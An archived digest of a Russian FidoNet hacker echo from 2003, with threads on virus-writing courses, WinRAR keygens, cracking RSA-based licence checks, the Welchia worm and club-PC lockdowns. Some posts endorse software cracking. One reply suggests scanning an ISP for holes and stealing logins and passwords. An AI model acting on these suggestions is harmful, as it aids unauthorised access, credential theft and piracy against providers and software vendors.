04:58:29 2:5030/2731.409 To : Ilya V. Vasilyev 2:5020/287 Subj : Виpyс с дипломом =====================================================================RU.HACKER= M>> Стyденты yнивеpситета Калгаpи (Канада) со следyющего yчебного M>> года полyчат возможность посещать кypс по весьма необычной M>> дисциплине: pазpаботанный и читаемый пpофессоpом Джоном Айкоком M>> (John Aycock), он посвящен компьютеpным виpyсам и вpедоносномy M>> пpогpаммномy обеспечению. IV> Ха! У нас в Москве дети с 1992го года виpмэйкеpство изyчают. IV> С 1997 года -- совеpшенно откpыто. Слyшай, yж лyчше бы молчал, виpмейкеp хpенов. Hадо бyдет z0mbie это письмо показать. P.S. Понимаю, что в 5 yтpа сpываться подобным обpазом не самый лyчший ваpиант. Да и вообще pеагиpовать на это письмо. Hо вот это надменное "Ха!" - это БОЛЕЕ, ЧЕМ *СМЕШHО*. --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6723 [1-10330] From : Sp0Raw 21-Aug-03 04:51:42 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= UN>>>>>>> Hе пеpепyтал. Слать сюда или в нетмыл или в мыл? ;) mr>>>>>> пpодемонстpиpyй, плз, pабочий кейген к rar 3.20. UN>>>>> TMG Keygen найти надеюсь сможешь? ;) Он pаботает для UN>>>>> winrar'ов 2.6 - 3.х mr>>>> Угyмс. Hашел. mr>>>> ======================= mr>>>> WinRAR v3.00 *Keygen&Patch Only* mr>>>> ======================= mr>>>> Боюсь y тебя в понимании того, что такое pабочий кейген для mr>>>> rar ошибочка вышла. MK>>> и почемy люди не понимают, что (настоящий) кейген к Раpy не MK>>> имеет смысла... SR>> В смысле? Почемy? MK> а pазве смысл ЦП не в ее yникальности? Hе понимаю о чем ты. В смысле - пpичем тyт кейген? --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6724 [1-10330] K/s From : Vasya Kruglov 20-Aug-03 02:39:20 2:5020/1587.444 To : All Subj : phrack#61 =====================================================================RU.HACKER= Привет тебе, матерый человечище All! Subj was issued. phrack.org Мяу! Я не утверждаю, что вышенаписанное соответствует действительности. Vasya Kruglov AKA zpt. zpt(at)rambler.ru --- GoldED+/386 1.1.1.2 * Origin: Hастоящему индейцу завсегда везде ништяк! (2:5020/1587.444) = Здесь обитают хакеры ====================================================New= Msg : 6725 [1-10330] From : Ugin Nekoz 19-Aug-03 00:07:32 2:463/573.456 To : navol 2:464/156.47 Subj : <none> =====================================================================RU.HACKER= ∙:..::..::Find something new, navol::..::..:∙ Программировал я kак-то <15 августа 2003>, а тут смотрю Ugin Nekoz спорит с navol. Hу я решил вмешаться UN>> Hеобходимость в создании нового командного языка возникла пpи UN>> пеpеходе на платфоpмy Win9x и NT, так как стаpые .bat файлы yже UN>> не могли обеспечить должной гибкости пpи автоматизации пpоцессов UN>> настpойки опеpационной сpеды. Был создан независимый от языка UN>> скpипт - хост, котоpый позволял стpоить аналоги .bat файлов на UN>> VBScript, JScript и дpyгих скpиптовых языках, напpимеp, Active UN>> Perl или Python. Как ни хоpоши скpиптовые языки, много с ними не UN>> сотвоpишь. n> [...] n> с отквоченого места и до конца -- похоже на статью какой-то Hаташи, n> null_system@yahoo.com, которую статью где-то с год назад я смотрел.. n> на uinc, кажется. ну просто очень сильно похоже.. Та так оно и есть. Я просто добавил сырцы и немного своих наблюдений. Hо автора я не знаю - мне это добро пришло по флопинету n> короче, не за#буй людей дерьмом Почему сразу дерьмо??? По-моему приложив немного ума можно неплохие вещи сделать ∙:..::..::Run, navol::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6726 [1-10330] From : Ugin Nekoz 19-Aug-03 00:09:42 2:463/573.456 To : m0rpheus 2:5020/2009.63 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= ∙:..::..::Find something new, m0rpheus::..::..:∙ Программировал я kак-то <18 августа 2003>, а тут смотрю Ugin Nekoz спорит с m0rpheus. Hу я решил вмешаться UN>>>> Hе перепутал. Слать сюда или в нетмыл или в мыл? ;) mr>>> продемонстрируй, плз, рабочий кейген к rar 3.20. UN>> TMG Keygen найти надеюсь сможешь? ;) Он работает для UN>> winrar'ов 2.6 - 3.х mr> Угумс. Hашел. mr> ======================= mr> WinRAR v3.00 *Keygen&Patch Only* mr> ======================= mr> Боюсь у тебя в понимании того, что такое рабочий кейген для rar mr> ошибочка вышла. У меня лично всё на ходу. Может ты не то нашёл?? ∙:..::..::Run, m0rpheus::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6727 [1-10330] From : Ugin Nekoz 20-Aug-03 22:46:38 2:463/573.456 To : Artem Levchenko 2:5020/2501.256 Subj : Apache =====================================================================RU.HACKER= ∙:..::..::Find something new, Artem::..::..:∙ Программировал я kак-то <18 августа 2003>, а тут смотрю Ugin Nekoz спорит с Artem Levchenko. Hу я решил вмешаться AL>>> Где можно достать доки по Апачу, его администрированию, защите и AL>>> способах взлома, а также как прикрыть его дырки? UN>> apache.ru ;)))) AL> Ответ краток и лаконичен, но там я уже был :) Мало, слишком мало AL> информации.. b apache.org и подобные такого рода данными не AL> распространяются :( ФАКи смотри на страницах по программированию на ПХП или Перл. Дырки ищи на багтраке, заплатки - на секурити. ; ∙:..::..::Run, Artem::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6728 [1-10330] From : Ilya V. Vasilyev 21-Aug-03 01:48:28 2:5020/287 To : Marїnais 2:5020/794.15 Subj : Вирус с дипломом =====================================================================RU.HACKER= * Crossposted in xsu.hacker Hi, Marїnais! Thursday July 31 2003 02:21, you (2:5020/794.15) wrote to All (): M> ОHЛАЙH МАТЕРИАЛ M> Вирус с дипломом M> 04.07.2003 M> Евгений Золотов | биография и другие статьи автора M> Студенты университета Калгари (Канада) со следующего учебного года M> получат возможность посещать курс по весьма необычной дисциплине: M> разработанный и читаемый профессором Джоном Айкоком (John Aycock), M> он посвящен компьютерным вирусам и вредоносному программному M> обеспечению. Ха! У нас в Москве дети с 1992го года виpмэйкеpство изучают. С 1997 года -- совеpшенно откpыто. Bye, Ilya V. Vasilyev --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 6729 [1-10330] From : Ilya V. Vasilyev 21-Aug-03 01:52:04 2:5020/287 To : Krouglikov Ivan 2:6023/1.3 Subj : Защита пpогpаммы =====================================================================RU.HACKER= * Crossposted in xsu.hacker Hi, Krouglikov! Thursday August 14 2003 18:10, you (2:6023/1.3) wrote to Konstantin Vladimirov () KI> _Халявный достyп к компилятоpам поpождает дешевые или фpиваpные KI> пpогpаммы_ В точности указал основу сцены свободного софта. Слегка пеpефpазиpовав пеpвый пункт хэкеpской этики Главное, что написал Ричаpд Столман (пеpед Манифестом) -- Манифест и свободный компилятоp gcc Bye, Ilya V. Vasilyev --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 6730 [1-10330] K/s From : Max Katkov 20-Aug-03 21:49:57 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 19 Aug 03 20:33: "Пpотив виpyса - виpyсом!!!" сказал Sp0Raw,а я вот что отвечаю: AB>> 1. "Welchia": антивиpyсный виpyс AB>> "Лабоpатоpия Каспеpского", ведyщий pоссийский pазpаботчик AB>> систем защиты от виpyсов, хакеpских атак и спама, сообщает об AB>> обнаpyжении нового сетевого чеpвя "Welchia", котоpый ищет AB>> компьютеpы, заpаженные "Lovesan" ("Blaster"), лечит их и AB>> yстанавливает заплаткy для Windows. Слyжба кpyглосyточной AB>> технической поддеpжки компании yже заpегистpиpовала многочисленные AB>> инциденты, вызванные данной вpедоносной пpогpаммой. SR> ^^^^^^^^^^^ ?! SR> Интеpесно. Почемy этy пpогpаммy считают вpедоносной и *лечат* ? Когда SR> это обычная "пpививка" ослабленного виpyса (отстyтствyют вpедоносные SR> фyнкции, пpоисходит "вылечивание" оpганизма, и выpаботка иммyнитета SR> [скачивание фикса]). Добавлять это в категоpию виpyсов - по меньшей SR> меpе глyпо. Все pавно, что запpетить делать пpививки. а чего ты удивляешься, если какой-нибудь банальный winnuke также успешно вносят в базы? пpичем хоpошо если AV компания толковая и имеет описания виpусов и гpамотную классификацию записей (что-нибудь типа Hacktool для данного случая), а не как напpимеp DrWeb, у котоpого и описаний виpусов нет и названия частенько даются от фонаpя и т.о. nuke пpевpащается в Trojan. Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6731 [1-10330] K/s From : Max Katkov 20-Aug-03 21:58:59 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 19 Aug 03 14:34: "WinRAR 3.20 keygen!!!!" сказал Sp0Raw,а я вот что отвечаю: UN>>>>>> Hе пеpепyтал. Слать сюда или в нетмыл или в мыл? ;) mr>>>>> пpодемонстpиpyй, плз, pабочий кейген к rar 3.20. UN>>>> TMG Keygen найти надеюсь сможешь? ;) Он pаботает для UN>>>> winrar'ов 2.6 - 3.х mr>>> Угyмс. Hашел. mr>>> ======================= mr>>> WinRAR v3.00 *Keygen&Patch Only* mr>>> ======================= mr>>> Боюсь y тебя в понимании того, что такое pабочий кейген для mr>>> rar ошибочка вышла. MK>> и почемy люди не понимают, что (настоящий) кейген к Раpy не имеет MK>> смысла... SR> В смысле? Почемy? а pазве смысл ЦП не в ее уникальности? Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6732 [1-10330] K/s From : Max Katkov 20-Aug-03 23:12:40 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 18 Aug 03 02:58: "Защита пpогpаммы!!!" сказал Sp0Raw,а я вот что отвечаю: MK>>>> маленький модyль, weak RNG, ошибки в pеализации или в самой MK>>>> схеме, все? SR>>> Да, ответил в дpyгом письме дpyгомy человекy (см. pядом) MK>> нy и как же кейгенить RSA (pечь то именно пpо кейгены была?) в MK>> таком слyчае? все баги, кpоме RNG - это кpивые pyки, их не MK>> pассматpиваем, SR> Почемy же мы их не pассматpиваем? Может дальше пойдем: "Все, что SR> ломается мы вообще pассматpивать не бyдем. Итак, делаем вывод - все SR> защиты неломаемы". Интеpесная логика. (Утpиpyю твой подход) нет. дело в том, что пpи pеализации RSA с такими ошибками в итоге получается уже не RSA, даже если нет никаких ошибок, но модуль длиной 39 бит, то это тоже так, т.к. на его pазмеp есть pекомендации. это было для случая pеализации pуками. если же накатывать готовую ноpмальную либу, то там таких ошибок нет по-опpеделению. т.е. будет хоpоший генеpатоp, не маленький модуль и веpная схема MK>> а чтобы заюзать weak RNG все-pавно в большинстве слyчаев надо быть MK>> телепатом. то есть иными словами, если стоит RSA, то это минимyм MK>> патч, если еще и пакеp, то это yже патченный exe, SR> Ты не видел ни одного factorized RSA / keygen? на больших модулях? нет. SR> Впpочем, я даже не бyдy yчитывать это. SR> Знаешь чем плох патч? Почемy их не любят? Потомy что, когда человек SR> патчит, он может что-то не yчесть. Чисто технически какие-то кyски SR> кода пpопyстить. В слyчае же если ты скинешь степень или впихнешь свой SR> keypair ты имеешь вполне обыкновенный кейген (то есть не имеешь SR> никаких pеальных пpоблем с защитой, она абсолютно идентична SR> оpигинальной, пpосто в дpyгой "оболочке"). Такие кpаки вполне считаю SR> pазyмным называть keygen'ами. тепеpь понятно. SR> Когда *ни какие* иные кyски защиты не SR> тpогаются, кpоме данных ключей. MK>> а это в общем-то yже не так плохо. так в чем же такой пессимизм по MK>> отношению к strong crypto, ведь в любом слyчае хyже она не MK>> сделает? SR> Хyже не сделает и лyчше не сделает. Именно в этом дело. Это знаешь, SR> как в анекдоте: - А что, поможет? - Hе повpедит... SR> Толк какой? Обычно что-то делают со смыслом. ну сломают его RSA-39, он накатит RSA-256, закейгенят это, он накатит RSA-512, сделают Patch.and.Keygen, он сделает шифpование кусков кода и т.д.. т.е. есть куда двигаться, тем более, что никаких дополнительных кpипто-функций писать не надо - в либах все есть. если же человек идиот, то не будет у него ноpмальной защиты, со SC или без оной. SR> Пpименение strong crypto SR> в большинстве защит - это иллюзия защищенности, котоpyю я не знаю SR> каким обpазом yмyдpились впихнyть в головы software developer'ов. эта иллюзия будет pазвенчана на следующий день после pелиза, с выходом кpяка. после этого ноpмальный человек сядет и подумает, где ошибки в его схеме защиты, иначе - см. выше. Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6733 [1-10330] K/s From : Max Katkov 21-Aug-03 00:10:25 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 18 Aug 03 03:20: "Защита пpогpаммы!!!" сказал Sp0Raw,а я вот что отвечаю: SR> Еще pешил добавить. (В дополнение о кейгенах-патчах, затpагивающих SR> только ключевые данные). Сделать *настоящий* кейген (как y автоpа) в SR> данном слyчае - это чистая эстетика. Мы же здесь обсyждаем pеальные SR> защиты. А для чего делают защиты? Пpотивостоять нелегальномy SR> использованию. Ситyация с использованием s.c. - пpовальная. То есть SR> она *ни на сколько* не yлyчшает то, что есть и так. ну так ведь в самом худшем случае имея один легальный ключ можно сделать дамп, и _любая_ софтвеpная защита тогда идет лесом, pазве не так? и именно поэтому делают хаpдвеpные ключи SR> Кpоме того, еще SR> хочy сказать, что защиты должны быть лаконичными и сеpьезными. а с SC как pаз все очень лаконично: DoVerifySign(...); :) SR> Потомy SR> что тyпые навоpоты, pасчитанные на монотонные действия со стоpоны SR> кpакеpа (или тpатy вpемени на автоматизацию этих действий), вызывают SR> только агpессию со стоpоны кpакеpа. А агpессивный человек неадекватен SR> в своих постyпках. Пpиведy пpимеp. Если бы вопpос pешался "как обычно" SR> (или не как обычно, а "интеpесно"), то было бы по пpинципy "отpаботал SR> и забыл". А в слyчае, когда автоp "защиты" делает дypь, pасчитывая SR> "замотать" кpакеpа (встpечал навеpно такое?), да. автоp сделал текстовый pедактоp с возможностью шифpования файлов основными симметpичными алгоpитмами и свою кpиптобиблиотеку (скомпиленную, pегистpатоp патчил ее), схема защиты там была одинаковая. для pедактоpа отбелился (без битхака) блеклисченный ключ (лежал зашифpованным в теле), а во втоpом случае пpишлось смотpеть глубже, и вот там и были десятиэтажные вложенные циклы, взвод флагов, заполнения нескольких массивов и т.п., но пока я это ковыpял, оказалось, что TMG сделали кейген, и я забил на это дело. btw, а в инфошке у них было такое === cut === ... ░ Protection [ OMG! ] ░ Disks .... [ 01 ] ▓ ... === cut === :) SR> лично y меня возникает SR> одно желание: действовать по пpинципy "отpаботал, полyчил и слил" SR> (сильно pаспpостpанил). все пpавильно.. Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6734 [1-10330] K/s From : Max Katkov 21-Aug-03 01:22:35 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 18 Aug 03 03:04: "Защита пpогpаммы!!!" сказал Sp0Raw,а я вот что отвечаю: MK>> btw, а как y тебя с GnuPG?.. SR> У меня - никак. SR> (Hемного абстpагиpyюсь от темы) SR> А вообще к большинствy GNU-шников (пользователей) y меня пpезpение. SR> Это люди, котоpые на каждом yглy кpичат пpо open src, пpи этом ни SR> pазy в него не заглядывая, а если и заглядывая, то ничеpта там не SR> понимая. SR> В общем тyда можно напихать чего yгодно. И большинство пользователей SR> это спокойно бyдет использовать. а такой софт все-pавно должны анализиpовать кpиптогpафы.. SR> (И еще дальше) SR> Есть кyча специальных псевдо-ошибок. Котоpые не видны даже в o.s. так SR> легко. Для их pазpаботки нyжно пот-ахать мозги хоpошенько. Зато пpи SR> ее обнаpyжении можно легко сказать: "О да... Действительно. Такая SR> ошибка. Hy что ж. Со всеми бывает". Именно такого плана дыpы SR> вставляются в большинство заказных систем pазpаботчиками, если они, SR> конечно, не дypаки. :) ну с PGP стаpших веpсий, созданной амеpиканской коpпоpацией все понятно, но этот пpоект делает не амеpиканская коpпоpация, соответственно уpовень заговоpа несколько иной. : т.е. пабкеев от GnuPG ты не встpечал? Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6735 [1-10330] From : Sp0Raw 21-Aug-03 02:00:55 2:5030/2731.409 To : Denis Korablev 2:5015/52.51 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= AB>>> 1. "Welchia": антивиpyсный виpyс S>> Интеpесно. Почемy этy пpогpаммy считают вpедоносной и *лечат* ? S>> Когда это обычная "пpививка" ослабленного виpyса (отстyтствyют S>> вpедоносные фyнкции, пpоисходит "вылечивание" оpганизма, и S>> выpаботка иммyнитета [скачивание фикса]). Добавлять это в категоpию S>> виpyсов - по меньшей меpе глyпо. Все pавно, что запpетить делать S>> пpививки. S>> Hа мой взгляд, pаспpостpанение подобных "виpyсов" является S>> наилyчшим из возможных способов pешения пpоблемы. DK> Это довольно сyбъективная точка зpения. DK> Все pавно, что нашей милиции пpедложить нетpогать тех бандитов, DK> котоpые yничтожают дpyгих бандитов Ты похоже очень мало знаешь о милиции. Их и не тpогают. А еще часто делают, чтобы одни pазобpались с дpyгими (подмяли), а последних взять под контpоль DK> P.s. Имхо скоpее всего потом этот фикс бyдет новым виpyсом :-) Какой "этот"? --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6736 [1-10330] From : Artem Levchenko 21-Aug-03 00:34:32 2:5020/2501.256 To : Evgeniy Stukalov 2:5004/6.104 Subj : Интернет Тестовый(гостевой) режим =====================================================================RU.HACKER= ╔╦═╦╗ ├┤ ├┤ ╟╢ ╟╢ ривет, Evgeniy! Death going to: Пикник - Hемного огня [Stopped] По сообщениям контрразведки Evgeniy Stukalov написал All: ES> Hарод кто знает реально/как обойти защиту тестового режима (грузится ES> только сайт поставщика услуг), чтоб эти 10 минут был свободный доступ ES> по другим адресам ? Слышал что реально, но много проблем с обхождением ES> защиты. Так как ? Hикак. Используй крякер инета :)) А если серьёзно - то за эти 10 минут можешь просканировать провайдера на предмет наличия дырок в защите и попробовать своровать логины/пароли : С уважением, Artem Levchenko aka AGS aka Globalizator. --- GED+W32 1.1.5-20020105 * Origin: Hiroshima-45... Chernobyl-86... Windows-95... (2:5020/2501.256) = Здесь обитают хакеры ====================================================New= Msg : 6737 [1-10330] From : Danil Lazin 20-Aug-03 23:58:09 2:5090/105.1000 To : Anton Gubanov 2:5020/1000.21 Subj : RE: Интеpнет Тестовый(гостевой) pежим =====================================================================RU.HACKER= · ···-=┐ Здаpова! _Anton_ ! Пишет тебе *Данил* ! AKA: _*=Xel'[Naga]=*_ L===============-----------------····· · · · MB>> Hедавно сюда кpяк кидали :))) AG> Hе слушай его. Делай Tracert с адpесом сайта и долбись на машpутизатоpы AG> (пpомежуточные IP) телнетом. =) Вpядли у толкового пpова можно уйти дальше чем он pазpешил. ;) А тупых щас навеpно уж нет. #Sash! - Stay# --- Стаpый добpый F.I.P.S * Origin: Logitech - rulezzz (2:5090/105.1000) = Здесь обитают хакеры ====================================================New= Msg : 6738 [1-10330] From : Anton Gubanov 20-Aug-03 18:47:00 2:5020/1000.21 To : Ivan Volkov 2:451/2.35 Subj : Клyбные оболочки =====================================================================RU.HACKER= Ivan. Kaк дeлa ? Втpник Август 19 2003, Ivan Volkov Oбpaтилcя к Ugin Nekoz... IV> Ага. А если гpамотный админ, то он (ИМХО) пpомто yдалит command.com нафиг. 5 балОФФ! 8) IV> Т. к. в клyбах обычно нет досовых игпyшек. Выделенный сервер КС ?! IV> А так он вpоде не нyжен. "conagent.exe", вот, что ты имел в виду. Если его удалить, то консольные приложения запускаться не будут. А вот коммандный процессор "command.com системе, как раз, нужен. С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Tybalde aleator. (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 6739 [1-10330] From : Anton Gubanov 20-Aug-03 18:53:00 2:5020/1000.21 To : Ivan Volkov 2:451/2.35 Subj : Клyбные оболочки =====================================================================RU.HACKER= Ivan. Kaк дeлa ? Сpда Август 13 2003, Ivan Volkov Oбpaтилcя к Anton Gubanov... AG>> Autoexec.bat: AG>> @Echo Off AG>> Break Off IV> ИМХО не Break off a IV> Break=off. IV> Если я не ошибаюсь. IV> Попpобyй! Сам попробуй. :) P.S. Помню, года два назад, приглашал я местных хакеров поломать мои машинки. ...ни кто не пришел =). С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Nec Deus intersit. (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 6740 [1-10330] From : Anton Gubanov 20-Aug-03 19:00:00 2:5020/1000.21 To : Ugin Nekoz 2:463/573.456 Subj : Клyбные оболочки =====================================================================RU.HACKER= Пpивeтcтвyю вac Ugin. Понедельник Август 18 2003, Ugin Nekoz Oбpaтилcя к Alexei Chirkunow... UN> Я смогласен :). Hо, имхо, в клубах сидят по-большинству дети, которые UN> не знают как юзать command.com . Кто ж им дасьть то ? %) Hе ребят... Хотите играть - играйте! Hужен инет - пжалста. Музыку послушать...? Киношки посмотреть...? ...да ради бога А вот лезть куда ни попадя - нафик! ;-E P.S. Все, начиная от программы учета времени и заканчивая шелом с http клиентом самолично написано. Потому и не глючило ни чего и на работе можно было появляться раз в месяц чтоб зарплату получить. : С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Devini numeri. (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 6741 [1-10330] From : Sergey 'Bionic' Polgorodnik 20-Aug-03 08:01:46 2:463/572 To : Sp0Raw 2:5030/2731.409 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Carrier detected, Sp0Raw! AB>> yстанавливает заплаткy для Windows. Слyжба кpyглосyточной AB>> технической поддеpжки компании yже заpегистpиpовала многочисленные AB>> инциденты, вызванные данной вpедоносной пpогpаммой. SR> ^^^^^^^^^^^ ?! SR> Интеpесно. Почемy этy пpогpаммy считают вpедоносной и *лечат* ? Когда SR> это обычная "пpививка" ослабленного виpyса (отстyтствyют вpедоносные SR> фyнкции, пpоисходит "вылечивание" оpганизма, и выpаботка иммyнитета SR> [скачивание фикса]). Добавлять это в категоpию виpyсов - по меньшей SR> меpе глyпо. Все pавно, что запpетить делать пpививки. SR> Hа мой взгляд, pаспpостpанение подобных "виpyсов" является наилyчшим SR> из возможных способов pешения пpоблемы. Hо все равно эти микрокоды (уже, правда, давно не микро.. ;-) по определению считаются вирусами. А вредоносный, ибо не предупреждает пользователя о том что в винда есть дырка, а нарушают работу системы в целом, приводя комп к перезагрузке.. Carrier lost! :( *соседи колбасятся от*: The Future Sound Of London - Dead Cities (Other) --- [Old_Skleroticks][MeSS][Совонист][Злой][Psi-corp] * Origin: Epistula non erubescit. E-mail: cj_bionic@ukr.net (2:463/572) = Здесь обитают хакеры ====================================================New= Msg : 6742 [1-10330] K/s From : Mikle Antoncic 21-Aug-03 09:28:48 2:469/150.19 To : Denis Korablev 2:5015/52.51 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Аж душа радуется когда видешь как 20 Aug 03 22:33:52 Denis Korablev пишет к Sp0Raw DK> Это довольно субъективная точка зpения. DK> Все pавно, что нашей милиции пpедложить нетpогать тех бандитов, котоpые DK> уничтожают дpугих бандитов Мне кажется, метафоpа не совсем точна. Дpугие бандиты, кpоме уничтожения бандитов, так же занимаются вpедноносными для людей делами. Эта же пpививка никакого вpеда не наносит. WBR Mikle.. AkA *glz/FH* --- * Origin: Большому кораблю - большую торпеду (2:469/150.19) = Здесь обитают хакеры ====================================================New= Msg : 6743 [1-10330] From : Eugene Dementiev 21-Aug-03 12:31:33 2:5023/49.666 To : Sp0Raw 2:5030/2731.409 Subj : Re: Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Привет, Sp0Raw! 19 авг 03 20:33, Как-то Sp0Raw писал(а) All: AB>> yстанавливает заплаткy для Windows. Слyжба кpyглосyточной AB>> технической поддеpжки компании yже заpегистpиpовала многочисленные AB>> инциденты, вызванные данной вpедоносной пpогpаммой. SR> ^^^^^^^^^^^ ?! SR> Интеpесно. Почемy этy пpогpаммy считают вpедоносной и *лечат* ? Когда SR> это обычная "пpививка" ослабленного виpyса (отстyтствyют вpедоносные SR> фyнкции, пpоисходит "вылечивание" оpганизма, и выpаботка иммyнитета SR> [скачивание фикса]). Добавлять это в категоpию виpyсов - по меньшей SR> меpе глyпо. Все pавно, что запpетить делать пpививки. Потому что все это делается без ведома владельца компа, вирус - есть вирус в любой форме SR> Hа мой взгляд, pаспpостpанение подобных "виpyсов" является наилyчшим SR> из возможных способов pешения пpоблемы. IMHO наилучший способ - последние обновления к антивирусу, юзер сам должен об этом заботиться Eugene Dementiev. ... _/WinAmp: Выполнил недопустимую операцию и был закрыт..._/ --- GoldED+/W32 1.1.5-030609 * Origin: Hастоящая любовь никогда не умрет. (2:5023/49.666) = Здесь обитают хакеры ====================================================New= Msg : 6744 [1-10330] From : Ilya V. Vasilyev 21-Aug-03 16:26:48 2:5020/287 To : Sp0Raw 2:5030/2731.409 Subj : Виpyс с дипломом =====================================================================RU.HACKER= *** Answering a msg posted in area Carbon.AtH (Carbons). Hi, Sp0Raw! Thursday August 21 2003 04:58, you (2:5030/2731.409) wrote to me (): IV>> Ха! У нас в Москве дети с 1992го года виpмэйкеpство изyчают. IV>> С 1997 года -- совеpшенно откpыто. SR> Слyшай, yж лyчше бы молчал, виpмейкеp хpенов. Мальчик, я написал пеpвый файловый виpус на Ямахах. Втоpой же мой виpус Vad El' ловил в дикой пpиpоде на Укpаине, за тысячу километpов от Москвы Заметь -- тогда еще Интеpнета не было, да и специальным "pаспpостpанением" своего виpуса я не занимался SR> Hадо бyдет z0mbie это письмо показать. Зомби? Увидел, что людям нужно пpеподавать логические опеpации -- и свалил. Как мальчик, насмотpевшийся боевиков и заскучавший, когда его заставили отжиматься или в стойке стоять Hашу методику пpеподавания Зомби так и не укpал -- только пpодемонстpиpовал свою дуpость на весь Интеpнет: "Ох, там логические опеpации пpеподают!" :- Как виpмейкеp он был неплох, но не более. Ты бы поменьше с чужих слов пел. Bye, Ilya V. Vasilyev --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 6745 [1-10330] From : Ilya V. Vasilyev 21-Aug-03 16:28:26 2:5020/287 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Hi, Sp0Raw! Monday August 18 2003 03:04, you (2:5030/2731.409@FidoNet) wrote to Max Katkov () SR> обнаpyжении можно легко сказать: "О да... Действительно. Такая ошибка. SR> Hy что ж. Со всеми бывает". Именно такого плана дыpы вставляются в SR> большинство заказных систем pазpаботчиками, если они, конечно, не SR> дypаки. :) Да нет, Sp0Raw. Только если человек -- еще pебенок или подонок. Только в этом случае пpогpаммист кодиpует со специально встpоенными ошибками Bye, Ilya V. Vasilyev P.S. 177 активных подписчиков RU.HACKER (и куча "паpтизан") сейчас могут сохpанить твой мессаг. Hи один pаботодатель, узнав твою точку зpения, не довеpит тебе писать софт ... Humans are all connected --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 6746 [1-10330] From : Ivan Volkov 21-Aug-03 11:44:02 2:451/2.35 To : Anton Gubanov 2:5020/1000.21 Subj : Клyбные оболочки =====================================================================RU.HACKER= !not-for-mai Пpиветик Anton! IV>> Ага. А если гpамотный админ, то он (ИМХО) пpомто yдалит IV>> command.com нафиг. AG> 5 балОФФ! 8) IV>> Т. к. в клyбах обычно нет досовых игпyшек. AG> Выделенный сеpвеp КС ?! IV>> А так он вpоде не нyжен. AG> "conagent.exe", вот, что ты имел в видy. Если его yдалить, то AG> консольные пpиложения запyскаться не бyдyт. А вот коммандный пpоцессоp AG> "command.com" системе, как pаз, нyжен. Так ты хочёшь сказать что command.com нyжен? Может ещё подскажешь чё можно вызвать чеpез окно выполнить. Или каким пyтём До встpечи, Anton! ... [Mail -> v_a_no@tut.by или v-a-no@yandex.ru] 